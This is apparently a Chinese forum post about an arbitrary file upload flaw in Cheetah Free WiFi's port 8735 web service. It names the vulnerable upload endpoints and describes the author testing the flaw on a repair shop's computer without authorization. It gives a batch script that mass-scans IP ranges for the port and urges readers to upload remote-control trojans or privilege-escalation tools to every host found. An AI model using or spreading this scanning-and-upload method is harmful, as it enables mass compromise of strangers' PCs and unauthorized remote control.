漏洞详情:

当猎豹wifi运行后会向外网开放8735端口(运行web),而其某接口存在漏洞导致任意文件上传,从而导致pc机沦陷。

http://电脑的IP:8735/tool/#upload

http://电脑的IP/api/replypic 存在漏洞导致任意文件上传

漏洞危害:

默认装C盘 可以实现挂马,指定***,拓展大企业内网监控pc机等。

 昨天去电脑维修店修电脑。发现他的电脑开的猎豹WIFI ,我就做了个简单的测试。
  前几天在乌云看到某大神说的漏洞就试了一下,如图:


图片

图片

 就这样简单:我做出了一个简单的猜想可以更多的***更多的电脑:
 
用3389端口扫描器更改扫描端口为8735 源代码为:

@echo off

color a

@del s.txt /q

@title 全黑8735端口扫描 by:全黑哥  QQ19894287

if not exist "IPs.txt" goto 1111

goto 11ss

:1111

echo 192.168.0.1 192.168.0.255(输入前先把现在这行文字删掉,请保留版权 by:全黑哥 19894287)>IPs.txt

call IPs.txt

:SSYY


cls

:11ss

for /f "eol= tokens=1,2 delims= " %%i in (IPs.txt) do s SYN %%i %%j 8735 /save

@del Result.txt /p 

图片
整理一下你们当地纯真IP,然后在服务器上面扫一下 出来的8735端口的99%都是在用猎豹免费WIFI的用户

  然后连接上传你的***远控也好  是提权开启管理帐号的程序也罢

    最后衷心希望各位大大多多的关注